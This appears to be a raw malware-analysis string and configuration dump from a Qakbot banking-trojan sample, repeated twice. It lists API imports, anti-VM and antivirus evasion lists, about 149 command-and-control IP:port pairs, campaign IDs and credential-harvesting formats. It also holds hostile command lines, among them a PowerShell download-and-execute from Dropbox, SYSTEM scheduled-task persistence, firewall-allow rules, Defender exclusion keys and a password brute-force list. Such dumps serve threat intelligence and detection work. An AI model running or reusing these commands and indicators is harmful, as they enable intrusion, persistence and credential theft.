Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set colFiles = objWMIService.ExecQuery("Select * From CIM_DataFile Where Name = '%s'") For Each objFile in colFiles objFile.Copy("%s") Next
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul)
SetCurrentDirectoryA
SetEndOfFile
SetEntriesInAclA
SetFilePointer
SetLastError
SetNamedSecurityInfoA
ShellExecuteA
ShowWindow
SizeofResource
SpyNetReporting
StackWalk64
StartServiceW
StrCmpIW
StrCmpNIA
StrStrIA
StrStrIW
StrStrW
StrTrimW
SubmitSamplesConsent
TranslateMessage
UnregisterClassA
UpdateWindow
VBoxGuest
VBoxVideo
VMAUDIO
VMware Accelerated
VMware Pointing
VMware Replay
VMware SCSI
VMware SVGA
VMware VMaudio
VMware Vista
VMware server memory
Virtual HD
VirtualAllocEx
VirtualFreeEx
VirtualProtect
VirtualProtectEx
WBJ_IGNORE
WEEKLY /D TUE,WED,THU /ST 12:00:00
WNetAddConnection2W
WNetCancelConnection2W
WNetCloseEnum
WNetEnumResourceW
WNetOpenEnumW
WRSA.exe
WSAConnect
WSAGetLastError
WSASend
WSASetLastError
WScript.Sleep %u Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul) WSCript.Sleep 2000 Set fso = CreateObject("Scripting.FileSystemObject")...
WTSEnumerateSessionsW
WTSFreeMemory
WTSQuerySessionInformationW
WTSQueryUserToken
WaitForSingleObject
Windows10 Edge HttpQueryInfo Bug!!!
WriteFile
WriteProcessMemory
ZwQueryInformationThread
ZwResumeThread
\sf2.dll
_decrypted.file;MultiAnalysis_v
aabcdeefghiijklmnoopqrstuuvwxyyz
aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
abc
abcdefghijklmnopqrstuvwxyz
administrator,argo,operator,administrador,user,prof,owner,usuario,admin,HP_Administrator,HP_Owner,Compaq_Owner,Compaq_Administrator
advapi32.dll
ansfltr
application/x-shockwave-flash
artifact.exe
aswhooka.dll
aswhookx.dll
avcuf32.dll
avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
avp.exe;kavtray.exe
bdagent.exe;vsserv.exe;vsservppl.exe
c1
c:\hiberfil.sysss
cashmanagementconnectionstring
ccSvcHst.exe
chrome.dll
chrome_child.dll
cmd /c schtasks.exe /Query > "%s"
cmd.exe /C \"start /MIN %s\system32\cscript.exe //E:javascript \"%s\"\" sudhfdus
cmd.exe /c ping -n 10 localhost && rmdir /S /Q "%s"
cmd=1&msg=%s&ports=
comet.yahoo.com;.hiro.tv;safebrowsing.google.com;geo.query.yahoo.com;googleusercontent.com;salesforce.com;officeapps.live.com;storage.live.com;messenger.live.com;.twimg.com;api.skype.com;mail.google.com;.bing.com;playtoga.com;.mozilla.com;.mozilla.org;hotbar.com;lphbs.com;contacts.msn.com;search.msn...
connect
coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
crypt32.dll
cryptui.dll
cscript.exe
data_after
data_before
data_end
data_inject
dbghelp.dll
dnsapi.dll
egui.exe;ekrn.exe
error res='%s' err=%d len=%u
exclude_url
explorer.exe
f1
firefox.exe
fmon.exe
fshoster32.exe
h1
h2
h3
https://
https://cdn.speedof.me/sample4096k.bin?r=0.%u
https://en.wikipedia.org/static/apple-touch/wikipedia.png
i1
i2
i3
i4
ignore_url
image/gif
image/jpeg
image/pjpeg
ivm-inject.dll
jHxastDcds)oMc=jvh7wdUhxcsdt2
k1
kb
kernel32.dll
m1
mcshield.exe
metsvc-server.exe
mlwr_smpl
mpr.dll
netapi32.dll
netsh advfirewall firewall add rule name="%s" dir=in action=allow program="%s" enable=yes
netsh firewall set allowedprogram "%s" %s ENABLE
netteller.com
npl
npq
nspr4.dll
nss3.dll
ntdll.dll
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command '%s'"
pstorec.dll
qbot_conf_path='%S' username='%S'
qbot_run_mutex='%s' username='%S'
reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
rsabase.dll
rsaenh.dll
s2
sample
sbtisht
send
set_url
shell32.dll
shlwapi.dll
siteadvisor.com;avgthreatlabs.com;safeweb.norton.com
snxhk_border_mywnd
srootkit
t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe
u1
urlmon.dll
user32.dll
vSockets
vkise.exe;isesrv.exe;cmdagent.exe
vm3dmp
vmacthlp.exe
vmdebug
vmnat.exe
vmrawdsk
vmscsi
vmtoolsd.exe
vmx_svga
vmxnet
w1
wbj.go
webinjects.cb
windbg.exe;ChromeUpdate.exe;msdev.exe;dbgview.exe;ollydbg.exe;ctfmon.exe;Proxifier.exe;nav.exe;Microsoft.Notes.exe;ShellExperienceHost.exe;SecHealthUI.exe
windump.exe
wininet.dll
wpcap.dll
ws2_32.dll
wtsapi32.dll
{%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
(PID) Process(3980) sample_packed.exe
Botnetspx133
Campaign1591267427
Version324.142
C2 (149)1.40.42.4:443
100.38.123.22:443
104.221.4.11:2222
104.50.141.139:995
105.184.48.142:443
108.27.217.44:443
108.31.92.113:443
108.51.73.186:443
108.58.9.238:993
108.58.9.238:995
128.234.46.27:443
134.0.196.46:995
137.103.143.124:443
140.82.21.191:443
142.129.227.86:443
151.73.126.205:443
173.172.205.216:443
173.175.29.210:443
173.187.169.73:443
173.22.120.11:2222
173.245.152.231:443
173.49.122.160:995
173.79.220.156:443
174.34.67.106:2222
175.111.128.234:443
176.193.41.32:2222
184.180.157.203:2222
184.98.104.7:995
185.246.9.69:995
188.192.75.8:443
188.192.75.8:995
188.27.71.163:443
189.140.112.184:443
189.159.133.162:995
197.165.178.49:443
2.88.183.192:443
203.33.139.134:443
207.162.184.228:443
207.255.161.8:2078
207.255.161.8:2087
207.255.161.8:2222
207.255.161.8:32102
207.255.161.8:32103
207.255.18.67:443
216.163.4.91:443
216.201.162.158:995
24.10.42.174:443
24.152.219.253:995
24.201.79.208:2078
24.226.137.154:443
24.42.14.241:443
24.43.22.220:443
24.43.22.220:995
24.46.40.189:2222
24.99.180.247:443
47.136.224.60:443
47.146.169.85:443
47.152.210.233:443
47.153.115.154:443
47.153.115.154:995
47.201.1.210:443
47.205.231.60:443
47.35.182.97:443
47.40.244.237:443
49.144.84.21:443
49.191.4.245:443
5.12.114.96:443
5.13.99.38:995
5.14.251.226:443
50.244.112.106:443
50.244.112.10:443
50.247.230.33:995
50.29.181.193:995
59.124.10.133:443
62.121.123.57:443
62.38.111.70:2222
64.121.114.87:443
64.19.74.29:995
65.131.83.170:995
65.24.76.114:443
66.222.88.126:995
66.26.160.37:443
67.131.59.17:443
67.209.195.198:3389
67.5.28.72:465
67.83.54.76:2222
68.174.15.223:443
69.245.144.167:443
69.28.222.54:443
69.40.17.142:443
69.92.54.95:995
70.174.3.241:443
70.183.127.6:995
71.163.225.75:443
71.185.60.227:443
71.187.170.235:443
71.77.231.251:443
71.80.66.107:443
71.88.104.107:995
72.16.212.108:465
72.177.157.217:995
72.183.129.56:443
72.190.101.70:443
72.204.242.138:2078
72.204.242.138:443
72.209.191.27:443
72.240.245.253:443
72.28.255.159:995
72.29.181.77:2078
72.69.180.183:61202
73.94.229.115:443
74.215.201.122:443
74.56.167.31:443
75.183.171.155:3389
75.81.25.223:443
75.87.161.32:995
76.15.41.32:443
76.170.77.99:443
76.187.8.160:443
77.237.181.212:995
78.96.192.26:443
78.97.145.242:443
79.113.219.121:443
79.115.128.221:443
79.117.161.67:21
79.119.67.149:443
80.195.103.146:2222
80.240.26.178:443
81.103.144.77:443
81.133.234.36:2222
82.127.193.151:2222
82.76.239.193:443
85.121.42.12:995
85.186.141.62:995
86.123.106.54:443
86.126.97.183:2222
89.44.195.186:2222
93.113.90.128:443
96.18.240.158:443
96.35.170.82:2222
96.37.137.42:443
96.41.93.96:443
96.56.237.174:993
97.93.211.17:443
98.114.185.3:443
98.115.138.61:443
98.118.156.172:443
98.219.77.197:443
98.32.60.217:443
SaltjHxastDcds)oMc=jvh7wdUhxcsdt2
Strings (456)/F
/c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
/ru ""
[begin]
[end]
cookie=[%s]
data=[%s]
exe=[%s] cmdline=[%s] pid=[%u] username=[%s]
ext_ip=[%s] dnsname=[%s] hostname=[%s] user=[%S] domain=[%S] is_admin=[%s] os=[%s] qbot_version=[%s] install_time=[%s] exe=[%S] prod_id=[%s]
host=[%s:%u] user=[%s] pass=[%s]
referer=[%s]
url=[%s]
url=[%s] data=[%s]
url=[%s] lb=[%s] data=[%s]
url=[%s] user=[%s] pass=[%s]
"%s\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn %s /tr "\"%s\" /I %s" /SC ONCE /Z /ST %02u:%02u /ET %02u:%02u
"%s\system32\schtasks.exe" /DELETE /F /TN %s
"%s\system32\schtasks.exe" /create /tn %S /tr "%s" /sc %S
%%%BOT_NICK%%%
%02u.%02u.%02u-%02u/%02u/%04u
%BOTID%
%BOT_COMPUTERNAME%
%BOT_MACHINE_UUID%
%BOT_USERDOMAIN%
%BOT_USERNAME%
%BOT_VENDOR_ID%
%ProgramFiles%\Internet Explorer\iexplore.exe
%ProgramFiles(x86)%\Internet Explorer\iexplore.exe
%SystemRoot%\SysWOW64\explorer.exe
%SystemRoot%\SysWOW64\mobsync.exe
%SystemRoot%\SysWOW64\xwizard.exe
%SystemRoot%\System32\mobsync.exe
%SystemRoot%\System32\xwizard.exe
%SystemRoot%\explorer.exe
%s "$windowsupdate = \"%s\"; & $windowsupdate"
%s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
%s \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"
%s%s/dupinst.php?n=%s&bg=%s&r=%u
%s\%s.vbs
%s\System32\WindowsPowerShell\v1.0\powershell.exe "$windowsupdate = \"%s\"; & $windowsupdate"
%s\System32\WindowsPowerShell\v1.0\powershell.exe \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"
%u.%s.%s.%08x
*/*
.cfg
.dat
.dll
.exe
.lnk
/bot_serv
/t3
000
1.nvprivateoffice.info
123,password,Password,letmein,1234,12345,123456,1234567,12345678,123456789,1234567890,qwerty,love,iloveyou,princess,pussy,master,monkey,abc123,99999999,9999999,999999,99999,9999,999,99,9,88888888,8888888,888888,88888,8888,888,88,8,77777777,7777777,777777,77777,7777,777,77,7,66666666,6666666,666666,6...
1234567890
2
23.49.13.33:7000
3
307
308
309
310
311
ADMIN$
ALLUSERSPROFILE
AdjustTokenPrivileges
Administrator
AllocateAndInitializeSid
AvastSvc.exe
ByteFence.exe
C$
C:\\INTERNAL\\__empty
CWSandbox
CertAddCRLContextToStore
CertAddCTLContextToStore
CertAddCertificateContextToStore
CertCloseStore
CertCreateCertificateChainEngine
CertDuplicateCRLContext
CertEnumCertificatesInStore
CertEnumSystemStore
CertFreeCRLContext
CertFreeCertificateChain
CertFreeCertificateChainEngine
CertFreeCertificateContext
CertGetCRLContextProperty
CertGetCertificateChain
CertGetEnhancedKeyUsage
CertGetNameStringW
CertOpenStore
CertSetCertificateContextProperty
CloseHandle
CloseServiceHandle
Content-Type: application/x-www-form-urlencoded
CreateDirectoryA
CreateFileA
CreateFileW
CreateProcessA
CreateProcessInternalW
CreateProcessW
CreateRemoteThread
CreateServiceW
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
CredEnumerateA
CredFree
CryptAcquireCertificatePrivateKey
CryptEnumOIDInfo
CryptFindOIDInfo
CryptUnprotectData
DefWindowProcA
DeleteFileA
DeleteService
DeleteServiceW
DeleteUrlCacheEntryW
DestroyWindow
DispatchMessageA
DnsQuery_A
DnsQuery_W
DynamicCodePolicy
EnumWindows
ExpandEnvironmentStringsA
Fiddler.exe;samp1e.exe;sample.exe;runsample.exe;lordpe.exe;regshot.exe;Autoruns.exe;dsniff.exe;VBoxTray.exe;HashMyFiles.exe;ProcessHacker.exe;Procmon.exe;Procmon64.exe;netmon.exe;vmtoolsd.exe;vm3dservice.exe;VGAuthService.exe;pr0c3xp.exe;ProcessHacker.exe;CFF Explorer.exe;dumpcap.exe;Wireshark.exe;i...
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
FindWindowA
FreeSid
FtpDeleteFileA
FtpGetFileA
FtpOpenFileA
GenuineIntel
GetClipboardData
GetCurrentDirectoryA
GetCurrentThreadId
GetForegroundWindow
GetMessageA
GetMessageW
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
GetUrlCacheEntryInfoW
GetVolumeInformationA
Global\{EEE80B68-1EF4-47C2-9017-59E46A84F3BC}
HOURLY /mo 5
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpQueryInfoW
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestW
IPC$
Initializing database...
InterlockedCompareExchange
InternetCloseHandle
InternetConnectA
InternetCrackUrlA
InternetGetCookieA
InternetGetCookieExA
InternetGetLastResponseInfoA
InternetOpenA
InternetOpenUrlA
InternetQueryDataAvailable
InternetQueryOptionA
InternetQueryOptionW
InternetReadFile
InternetReadFileExA
InternetSetOptionA
InternetSetStatusCallback
InternetWriteFile
LdrGetProcedureAddress
LdrLoadDll
LoadLibraryA
LoadResource
LocalFree
LookupAccountSidA
LookupAccountSidW
MBAMService.exe;mbamgui.exe
MessageBoxA
Microsoft
MicrosoftEdge.exe
Module32First
Module32Next
MoveFileA
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
MsMpEng.exe
NAT-PMP %u tcp
NetApiBufferFree
NetGetDCName
NetShareEnum
NetUserEnum
NetWkstaGetInfo
NtAllocateVirtualMemory
NtClose
NtCreateSection
NtFreeVirtualMemory
NtGetContextThread
NtMapViewOfSection
NtProtectVirtualMemory
NtQueryInformationProcess
NtQueryVirtualMemory
NtReadVirtualMemory
NtSetContextThread
NtUnmapViewOfSection
NtWow64QueryInformationProcess64
NtWow64ReadVirtualMemory64
NtWriteVirtualMemory
ObtainUserAgentString
OpenProcess
OpenSCManagerW
OpenThread
PFXExportCertStore
PR_Close
PR_GetError
PR_GetNameForIdentity
PR_OpenTCPSocket
PR_Read
PR_SetError
PR_Write
PStoreCreateInstance
PathCombineA
PathCombineW
PathMatchSpecA
PathMatchSpecW
PathUnquoteSpacesW
PeekMessageA
PeekMessageW
PostMessageA
PostQuitMessage
Process32First
Process32Next
ProfileImagePath
QEMU
QueryFullProcessImageNameW
Query_Main
RapportGP.DLL
ReadFile
ReadProcessMemory
Red Hat VirtIO
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegEnumKeyExA
RegEnumValueA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryValueExA
RegSetValueExA
RegisterClassExA
RtlGetVersion
RtlNtStatusToDosError
RtlSetLastWin32Error
SAVAdminService.exe;SavService.exe
SOFTWARE\Microsoft\Internet Explorer\CodeIntegrity
SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
SOFTWARE\Microsoft\Windows Defender\SpyNet
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
SbieDll.dll
Self test FAILED!!!
Self test OK.
SendMessageA
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set colFiles = objWMIService.ExecQuery("Select * From CIM_DataFile Where Name = '%s'") For Each objFile in colFiles objFile.Copy("%s") Next
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul)
SetCurrentDirectoryA
SetEndOfFile
SetEntriesInAclA
SetFilePointer
SetLastError
SetNamedSecurityInfoA
ShellExecuteA
ShowWindow
SizeofResource
SpyNetReporting
StackWalk64
StartServiceW
StrCmpIW
StrCmpNIA
StrStrIA
StrStrIW
StrStrW
StrTrimW
SubmitSamplesConsent
TranslateMessage
UnregisterClassA
UpdateWindow
VBoxGuest
VBoxVideo
VMAUDIO
VMware Accelerated
VMware Pointing
VMware Replay
VMware SCSI
VMware SVGA
VMware VMaudio
VMware Vista
VMware server memory
Virtual HD
VirtualAllocEx
VirtualFreeEx
VirtualProtect
VirtualProtectEx
WBJ_IGNORE
WEEKLY /D TUE,WED,THU /ST 12:00:00
WNetAddConnection2W
WNetCancelConnection2W
WNetCloseEnum
WNetEnumResourceW
WNetOpenEnumW
WRSA.exe
WSAConnect
WSAGetLastError
WSASend
WSASetLastError
WScript.Sleep %u Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul) WSCript.Sleep 2000 Set fso = CreateObject("Scripting.FileSystemObject")...
WTSEnumerateSessionsW
WTSFreeMemory
WTSQuerySessionInformationW
WTSQueryUserToken
WaitForSingleObject
Windows10 Edge HttpQueryInfo Bug!!!
WriteFile
WriteProcessMemory
ZwQueryInformationThread
ZwResumeThread
\sf2.dll
_decrypted.file;MultiAnalysis_v
aabcdeefghiijklmnoopqrstuuvwxyyz
aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
abc
abcdefghijklmnopqrstuvwxyz
administrator,argo,operator,administrador,user,prof,owner,usuario,admin,HP_Administrator,HP_Owner,Compaq_Owner,Compaq_Administrator
advapi32.dll
ansfltr
application/x-shockwave-flash
artifact.exe
aswhooka.dll
aswhookx.dll
avcuf32.dll
avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
avp.exe;kavtray.exe
bdagent.exe;vsserv.exe;vsservppl.exe
c1
c:\hiberfil.sysss
cashmanagementconnectionstring
ccSvcHst.exe
chrome.dll
chrome_child.dll
cmd /c schtasks.exe /Query > "%s"
cmd.exe /C \"start /MIN %s\system32\cscript.exe //E:javascript \"%s\"\" sudhfdus
cmd.exe /c ping -n 10 localhost && rmdir /S /Q "%s"
cmd=1&msg=%s&ports=
comet.yahoo.com;.hiro.tv;safebrowsing.google.com;geo.query.yahoo.com;googleusercontent.com;salesforce.com;officeapps.live.com;storage.live.com;messenger.live.com;.twimg.com;api.skype.com;mail.google.com;.bing.com;playtoga.com;.mozilla.com;.mozilla.org;hotbar.com;lphbs.com;contacts.msn.com;search.msn...
connect
coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
crypt32.dll
cryptui.dll
cscript.exe
data_after
data_before
data_end
data_inject
dbghelp.dll
dnsapi.dll
egui.exe;ekrn.exe
error res='%s' err=%d len=%u
exclude_url
explorer.exe
f1
firefox.exe
fmon.exe
fshoster32.exe
h1
h2
h3
https://
https://cdn.speedof.me/sample4096k.bin?r=0.%u
https://en.wikipedia.org/static/apple-touch/wikipedia.png
i1
i2
i3
i4
ignore_url
image/gif
image/jpeg
image/pjpeg
ivm-inject.dll
jHxastDcds)oMc=jvh7wdUhxcsdt2
k1
kb
kernel32.dll
m1
mcshield.exe
metsvc-server.exe
mlwr_smpl
mpr.dll
netapi32.dll
netsh advfirewall firewall add rule name="%s" dir=in action=allow program="%s" enable=yes
netsh firewall set allowedprogram "%s" %s ENABLE
netteller.com
npl
npq
nspr4.dll
nss3.dll
ntdll.dll
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command '%s'"
pstorec.dll
qbot_conf_path='%S' username='%S'
qbot_run_mutex='%s' username='%S'
reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
rsabase.dll
rsaenh.dll
s2
sample
sbtisht
send
set_url
shell32.dll
shlwapi.dll
siteadvisor.com;avgthreatlabs.com;safeweb.norton.com
snxhk_border_mywnd
srootkit
t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe
u1
urlmon.dll
user32.dll
vSockets
vkise.exe;isesrv.exe;cmdagent.exe
vm3dmp
vmacthlp.exe
vmdebug
vmnat.exe
vmrawdsk
vmscsi
vmtoolsd.exe
vmx_svga
vmxnet
w1
wbj.go
webinjects.cb
windbg.exe;ChromeUpdate.exe;msdev.exe;dbgview.exe;ollydbg.exe;ctfmon.exe;Proxifier.exe;nav.exe;Microsoft.Notes.exe;ShellExperienceHost.exe;SecHealthUI.exe
windump.exe
wininet.dll
wpcap.dll
ws2_32.dll
wtsapi32.dll
{%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
(PID) Process(4076) sample_packed.exe
Botnetspx133
Campaign1591267427
Version324.142
C2 (149)1.40.42.4:443
100.38.123.22:443
104.221.4.11:2222
104.50.141.139:995
105.184.48.142:443
108.27.217.44:443
108.31.92.113:443
108.51.73.186:443
108.58.9.238:993
108.58.9.238:995
128.234.46.27:443
134.0.196.46:995
137.103.143.124:443
140.82.21.191:443
142.129.227.86:443
151.73.126.205:443
173.172.205.216:443
173.175.29.210:443
173.187.169.73:443
173.22.120.11:2222
173.245.152.231:443
173.49.122.160:995
173.79.220.156:443
174.34.67.106:2222
175.111.128.234:443
176.193.41.32:2222
184.180.157.203:2222
184.98.104.7:995
185.246.9.69:995
188.192.75.8:443
188.192.75.8:995
188.27.71.163:443
189.140.112.184:443
189.159.133.162:995
197.165.178.49:443
2.88.183.192:443
203.33.139.134:443
207.162.184.228:443
207.255.161.8:2078
207.255.161.8:2087
207.255.161.8:2222
207.255.161.8:32102
207.255.161.8:32103
207.255.18.67:443
216.163.4.91:443
216.201.162.158:995
24.10.42.174:443
24.152.219.253:995
24.201.79.208:2078
24.226.137.154:443
24.42.14.241:443
24.43.22.220:443
24.43.22.220:995
24.46.40.189:2222
24.99.180.247:443
47.136.224.60:443
47.146.169.85:443
47.152.210.233:443
47.153.115.154:443
47.153.115.154:995
47.201.1.210:443
47.205.231.60:443
47.35.182.97:443
47.40.244.237:443
49.144.84.21:443
49.191.4.245:443
5.12.114.96:443
5.13.99.38:995
5.14.251.226:443
50.244.112.106:443
50.244.112.10:443
50.247.230.33:995
50.29.181.193:995
59.124.10.133:443
62.121.123.57:443
62.38.111.70:2222
64.121.114.87:443
64.19.74.29:995
65.131.83.170:995
65.24.76.114:443
66.222.88.126:995
66.26.160.37:443
67.131.59.17:443
67.209.195.198:3389
67.5.28.72:465
67.83.54.76:2222
68.174.15.223:443
69.245.144.167:443
69.28.222.54:443
69.40.17.142:443
69.92.54.95:995
70.174.3.241:443
70.183.127.6:995
71.163.225.75:443
71.185.60.227:443
71.187.170.235:443
71.77.231.251:443
71.80.66.107:443
71.88.104.107:995
72.16.212.108:465
72.177.157.217:995
72.183.129.56:443
72.190.101.70:443
72.204.242.138:2078
72.204.242.138:443
72.209.191.27:443
72.240.245.253:443
72.28.255.159:995
72.29.181.77:2078
72.69.180.183:61202
73.94.229.115:443
74.215.201.122:443
74.56.167.31:443
75.183.171.155:3389
75.81.25.223:443
75.87.161.32:995
76.15.41.32:443
76.170.77.99:443
76.187.8.160:443
77.237.181.212:995
78.96.192.26:443
78.97.145.242:443
79.113.219.121:443
79.115.128.221:443
79.117.161.67:21
79.119.67.149:443
80.195.103.146:2222
80.240.26.178:443
81.103.144.77:443
81.133.234.36:2222
82.127.193.151:2222
82.76.239.193:443
85.121.42.12:995
85.186.141.62:995
86.123.106.54:443
86.126.97.183:2222
89.44.195.186:2222
93.113.90.128:443
96.18.240.158:443
96.35.170.82:2222
96.37.137.42:443
96.41.93.96:443
96.56.237.174:993
97.93.211.17:443
98.114.185.3:443
98.115.138.61:443
98.118.156.172:443
98.219.77.197:443
98.32.60.217:443
SaltjHxastDcds)oMc=jvh7wdUhxcsdt2
Strings (456)/F
/c ping.exe -n 6 127.0.0.1 & type "%s\System32\calc.exe" > "%s"
/ru ""
[begin]
[end]
cookie=[%s]
data=[%s]
exe=[%s] cmdline=[%s] pid=[%u] username=[%s]
ext_ip=[%s] dnsname=[%s] hostname=[%s] user=[%S] domain=[%S] is_admin=[%s] os=[%s] qbot_version=[%s] install_time=[%s] exe=[%S] prod_id=[%s]
host=[%s:%u] user=[%s] pass=[%s]
referer=[%s]
url=[%s]
url=[%s] data=[%s]
url=[%s] lb=[%s] data=[%s]
url=[%s] user=[%s] pass=[%s]
"%s\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn %s /tr "\"%s\" /I %s" /SC ONCE /Z /ST %02u:%02u /ET %02u:%02u
"%s\system32\schtasks.exe" /DELETE /F /TN %s
"%s\system32\schtasks.exe" /create /tn %S /tr "%s" /sc %S
%%%BOT_NICK%%%
%02u.%02u.%02u-%02u/%02u/%04u
%BOTID%
%BOT_COMPUTERNAME%
%BOT_MACHINE_UUID%
%BOT_USERDOMAIN%
%BOT_USERNAME%
%BOT_VENDOR_ID%
%ProgramFiles%\Internet Explorer\iexplore.exe
%ProgramFiles(x86)%\Internet Explorer\iexplore.exe
%SystemRoot%\SysWOW64\explorer.exe
%SystemRoot%\SysWOW64\mobsync.exe
%SystemRoot%\SysWOW64\xwizard.exe
%SystemRoot%\System32\mobsync.exe
%SystemRoot%\System32\xwizard.exe
%SystemRoot%\explorer.exe
%s "$windowsupdate = \"%s\"; & $windowsupdate"
%s %04x.%u %04x.%u res: %s seh_test: %u consts_test: %d vmdetected: %d createprocess: %d
%s \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"
%s%s/dupinst.php?n=%s&bg=%s&r=%u
%s\%s.vbs
%s\System32\WindowsPowerShell\v1.0\powershell.exe "$windowsupdate = \"%s\"; & $windowsupdate"
%s\System32\WindowsPowerShell\v1.0\powershell.exe \"$windowsupdate = \\\"%s\\\"; & $windowsupdate\"
%u.%s.%s.%08x
*/*
.cfg
.dat
.dll
.exe
.lnk
/bot_serv
/t3
000
1.nvprivateoffice.info
123,password,Password,letmein,1234,12345,123456,1234567,12345678,123456789,1234567890,qwerty,love,iloveyou,princess,pussy,master,monkey,abc123,99999999,9999999,999999,99999,9999,999,99,9,88888888,8888888,888888,88888,8888,888,88,8,77777777,7777777,777777,77777,7777,777,77,7,66666666,6666666,666666,6...
1234567890
2
23.49.13.33:7000
3
307
308
309
310
311
ADMIN$
ALLUSERSPROFILE
AdjustTokenPrivileges
Administrator
AllocateAndInitializeSid
AvastSvc.exe
ByteFence.exe
C$
C:\\INTERNAL\\__empty
CWSandbox
CertAddCRLContextToStore
CertAddCTLContextToStore
CertAddCertificateContextToStore
CertCloseStore
CertCreateCertificateChainEngine
CertDuplicateCRLContext
CertEnumCertificatesInStore
CertEnumSystemStore
CertFreeCRLContext
CertFreeCertificateChain
CertFreeCertificateChainEngine
CertFreeCertificateContext
CertGetCRLContextProperty
CertGetCertificateChain
CertGetEnhancedKeyUsage
CertGetNameStringW
CertOpenStore
CertSetCertificateContextProperty
CloseHandle
CloseServiceHandle
Content-Type: application/x-www-form-urlencoded
CreateDirectoryA
CreateFileA
CreateFileW
CreateProcessA
CreateProcessInternalW
CreateProcessW
CreateRemoteThread
CreateServiceW
CreateThread
CreateToolhelp32Snapshot
CreateWindowExA
CredEnumerateA
CredFree
CryptAcquireCertificatePrivateKey
CryptEnumOIDInfo
CryptFindOIDInfo
CryptUnprotectData
DefWindowProcA
DeleteFileA
DeleteService
DeleteServiceW
DeleteUrlCacheEntryW
DestroyWindow
DispatchMessageA
DnsQuery_A
DnsQuery_W
DynamicCodePolicy
EnumWindows
ExpandEnvironmentStringsA
Fiddler.exe;samp1e.exe;sample.exe;runsample.exe;lordpe.exe;regshot.exe;Autoruns.exe;dsniff.exe;VBoxTray.exe;HashMyFiles.exe;ProcessHacker.exe;Procmon.exe;Procmon64.exe;netmon.exe;vmtoolsd.exe;vm3dservice.exe;VGAuthService.exe;pr0c3xp.exe;ProcessHacker.exe;CFF Explorer.exe;dumpcap.exe;Wireshark.exe;i...
FindClose
FindFirstFileA
FindNextFileA
FindResourceA
FindWindowA
FreeSid
FtpDeleteFileA
FtpGetFileA
FtpOpenFileA
GenuineIntel
GetClipboardData
GetCurrentDirectoryA
GetCurrentThreadId
GetForegroundWindow
GetMessageA
GetMessageW
GetModuleFileNameA
GetModuleHandleA
GetProcAddress
GetUrlCacheEntryInfoW
GetVolumeInformationA
Global\{EEE80B68-1EF4-47C2-9017-59E46A84F3BC}
HOURLY /mo 5
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestW
HttpQueryInfoA
HttpQueryInfoW
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExW
